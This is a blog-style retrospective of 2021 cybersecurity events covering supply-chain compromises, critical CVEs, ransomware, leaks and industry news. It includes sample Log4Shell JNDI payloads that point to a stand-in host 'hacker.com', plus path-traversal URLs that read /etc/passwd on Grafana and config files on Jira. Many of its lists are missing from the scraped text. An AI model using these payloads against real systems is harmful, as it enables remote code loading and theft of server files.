18 March 2022 Retrospectives Vlad
You like this content ?
Share it on the networks
Here it is, here it is, it smells like not fresh fish and after-dinner drinks π₯³, it's my traditional arbitrary top cybersecurity events of the past year 2021 π.
As this is a "top", the goal is not to detail each subject, for that, I refer you to the OSSIR news reviews in PDF and video (https://www.ossir.org/support-des-presentations/?date=2021)
Let's get to the heart of the matter, the year 2020 was quite catastrophic with major data leaks, large scale vendor compromises, major vulnerabilities...
I ended the year with this meme accompanying my test greetings:
The main question then is "what was the year 2021?"
A hint, I had started the year with this edit π :
So-called "supply chain" attacks are old, but they have become increasingly common in recent years.
Remember the hacks of :
2021 confirmed this trend with more and more hacks.
In 2021, we had the aftermath of the Solarwinds hack, which led to the compromise of thousands of U.S. agencies, Microsoft, FireEye ... :
In 2021, we had the hacks of:
In 2021, as in previous years, we had the deployments of rogue libraries:
The situation seems to be getting worse and worse and this is partly true, for three main reasons:
2021 confirmed this trend with more major vulnerabilities having major impacts.
Moreover, this year concluded with Log4J which is definitely characteristic of 2021.
In 2021, we had the real fix for ZeroLogon, a vulnerability that allows to instantly become an administrator of a Microsoft Active Directory domain (review of 2021-02-09):
CVE-2020-1472; massively exploited in the wild; CVSS=10.0/10 (as a reminder, the CVSS score allows to calculate the technical criticality of a vulnerability from 0 to 10, a score higher than 9 being the end of the world π)In 2021, we had Microsoft Exchange, the email management software, back in fashion (for attackers) and packed with major vulnerabilities:
CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065; massively exploited in the wild; CVSS=10.0/10
Found by Orange Tsai
Corrected to the wild by the FBI at U.S. companies (reviewed on 2021-05-13)CVE-2021-31196, CVE-2021-31195 ; ; CVSS=7.2/10
Found by Orange Tsai
Deserves its place in #VulnsOfThe90sCVE-2021-28480, CVE-2021-28481, CVE-2021-28482, CVE-2021-28483; ; CVSS=9.8/10
One of which was reported by the NSACVE-2021-34473, CVE-2021-34523, CVE-2021-31207; massively exploited in the wild; CVSS=10.0/10
Submitted to Pwn2OwnIn 2021, Microsoft Azure CosmoDB (with Jupyter Notebook) experienced the leak of CosmoDB keys from all Notebooks, allowing data to be stolen from all databases of all customers (reviewed on 2021-09-14).
In 2021, virtualization solutions leader VMWare suffered major vulnerabilities in its flagship products, sometimes exposed live on the Internet π€¦ββοΈ :
In 2021, the Palo Alto Networks vendor also suffered from a remote takeover without authentication (2021-12-12 review):
CVE-2021-3064; exploited in the wild; CVSS=9.8/10
Would also deserve its place in #VulnsCyberSec
Vulnerability causing a triple "bad buzz":
βΉ Vulnerability discovered by US pentesting company Randori, who kept it under wraps for 1 year! Which is unethical
βΉ Palo Alto who discreetly modified their security bulletin to make it look like they had fixed the vulnerability 1 year before
Palo Alto which... does not pay researchers who report vulnerabilities to themIn 2021, Bloomberg published an article about the 3 hacks of Juniper (router and firewall editor) that led to the addition of backdoors by (review of 2021-09-14) :
In 2021, Gitlab CE, the source code management and software factory software (CI/CD pipeline) was vulnerable to a remote takeover without authentication (2021-11-09 review):
CVE-2021-22205; exploited in the wild; CVSS=10.0/10
From a vulnerability in the "ExifTool" image processing tool (CVE-2021-22204).Let's take a quick look at what you use the most and for which hundreds of vulnerabilities have been fixed in 2021:
iOS, we will talk about it again in the legal part, with the "NSO Group" case.
And finally, you were all waiting for it, because it spoiled our Christmas vacations: Log4J π₯³π logging library, with a remote takeover without authentication (2021-12-12 review):
Version 2.14, CVE-2021-44228; massively exploited in the wild; CVSS=10.0/10 (example exploit: ${jndi:ldap://hacker.com:389/a})
Version 2.15, CVE-2021-45046; exploited in the wild; CVSS=9.0/10 (exploit example: ${jndi:ldap://127.0.0.1#hacker.com:389/a} )
Version 2.16, CVE-2021-45105; exploited in the wild; CVSS=5.9/10 (example exploit: {${::-${::-$.${::-j}}}} )
Version 2.17, CVE-2021-44832 ; ; CVSS=6.6/10 (if the attacker can modify the configuration file and add a JNDI path in the JDBCAppender, so unlikely π )From what I remember, it was around 2014-2015 that people started to realize that cybersecurity products were software like any other: stuffed with vulnerabilities.
I remember in particular the work of Tavis Ormandi who found critical vulnerabilities in the most famous antivirus products.
2021 was a continuation of the previous years. In 2021, we could see vulnerabilities on security solutions from the editor Fortinet :
β CVE-2020-29016 and CVE-2020-29019 (Buffer overflow), CVE-2020-29015 (SQL Injection) ...; exploited in the wild; CVSS=9.8/10
β CVE-2021-26102; exploited in the wild; CVSS=9.8/10 In 2021, again Palo Alto Network firewalls had a remote takeover without authentication on the Telnet service (reviewed on 2021-03-09): β CVE-2020-10188; ; CVSS=8.1/10
In 2021, IBM Qradar log analysis (SIEM) software suffered a remote control takeover without authentication (2021-02-09 review):
<<The 90s just called, they want their vulnerabilities back...>>
When we see some of the vulnerabilities of 2021, their technical aspect, the triviality with which they can be exploited, we are tempted to draw a parallel with the beginnings of the Internet in the 90's-2000's and the almost total absence of security. Microsoft seems to be a specialist in the discipline:
β CVE-2021-1675, CVE-2021-34527, CVE-2021-36936, CVE-2021-36958; exploited massively in the wild; CVSS=8.8/10
β CVE-2021-36934; exploited in the wild; CVSS=7.8/10
β CVE-2021-36942; exploited in the wild; CVSS=7.5/10
β CVE-2021-43798; ; CVSS=7.5/10 β With a simple: "http://cible:3000/public/plugins/loki/../../../../../../../../etc/passwd"
β CVE-2021-22005; massively exploited in the wild; CVSS=9.8/10
β CVE-2021-26086; exploited in the wild; CVSS=5.3/10 β With a simple "http://cible/s/cfx/_/;/WEB-INF/web.xml" or "http://cible/s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties"
And I'm not going to talk about SOHO routers, those network boxes for small companies or individuals, doing WiFi, Internet access... full of trivial vulnerabilities (review of 2021-03-09).
This business model of cybercriminals does not seem to slow down (all reviews π ) with some outstanding or out of the ordinary facts.
Revil group started targeting insurers for new targets (2021-04-13 review) The Babuk Group has compromised the Washington D.C. Police Department and threatened to release information about their informants (2021-05-13 review). The DarkSide Group (an affiliate) hacked and held the U.S. Colonial Pipeline to ransom (2021-05-13 review). The Conti Group hacked a British diamond dealer and apologized for it (at the request of the Kremlin) after releasing the data, some of which was linked to Mohammed Bin Salman (2021-11-09 review).
What could be better than hacking a cybersecurity researcher and stealing his work including his unpublished vulnerabilities. This is not really a novelty but in 2021, there have been several cases of this type.
An espionage campaign (led by North Korea) targeted cybersecurity researchers with fake researcher profiles, fake blogs and booby-trapped Visual Studio project mailings (2021-02-09 review). The company Bastion Secure (actually the FIN7 group) published fake job offers, to manipulate researchers into carrying out ransomware attacks (2021-11-09 review).
Every year has its data leaks and 2021 is no exception with a large number of data leaks or privacy breaches.
There was the Dedalus affair, with the theft and publication of medical data concerning 491,840 French people, including 300,000 Bretons (review of 2021-03-09) As every year, Facebook has been involved in problems concerning personal data:
Gravatar was hacked with the leakage of 124 million users' data (2021-12-12 review) Finally in 2021, Wired published an article about Amazon and the lack of respect for its customers' data (review of 2021-12-12)
A bit like for major vulnerabilities, some outages have a very large impact and every year, different web actors manage to surprise us with the creativity of their outages, especially for GAFAM/MAGMA, for which this happens regularly.
Fastly CDN had a "short" outage with many cascading impacts (2021-09-14) Facebook went down due to a BGP problem (2021-10-12 review)
Fortunately, our law enforcement agencies are not idle and regularly arrest cybercriminals.
This year 2021 was particularly rich in arrests. Egregor operators arrested (review of 2021-03-09) The technical brain of the group FIN7, was sentenced to 10 years in prison (review of 2021-05-13) 7 members of Revil/GanCrab arrested (reviewed on 2021-11-09) Europol carried out some nice operations:
Several cybersecurity-related conferences or events stood out in 2021.
These cybersecurity conferences or events or media include:
Each year sees its share of buyouts, fundraisings, low blows and the creation of interest groups.
2021 was again a particularly rich year in these areas. Tenable bought Alsid for $98m (2021-03-09 review) Datadog bought Sqreen with Bercy studying the file closely (2021-03-09 review) ThreatQuotient raised $22m (reviewed on 2021-04-13) Glimps raised β¬6m (reviewed on 2021-04-13) The list of GAIA-X members (the European Cloud), has been published but composed of very (too) many non-European editors (reviewed on 2021-04-13) CrowdSec has raised 5mβ¬ (reviewed on 2021-05-13) FireEye was sold for $1.2 billion (2021-09-14 review) Vade Secure has been fined $14m by the US (2021-09-14 review)
The publications are essential to help improve the level of all and for some, become the repositories of the field.
The ANSSI has published, among others:
This year has been particularly marked by legal events.
The cyber risk has been ranked among the main ones according to the "Davos Forum" (review of 2021-02-09) As a result of changes in Whatsapp's terms of use, people have massively migrated to Signal (reviewed on 2021-02-09)
The Israeli company (long known and linked to the Khashoggi affair) and its malware have been at the heart of one of the biggest espionage cases in recent years with :
.".."..".."..".."..".."..".."..".."._
Finally, what seems to me to characterize this year the most is the very large number of vulnerabilities:
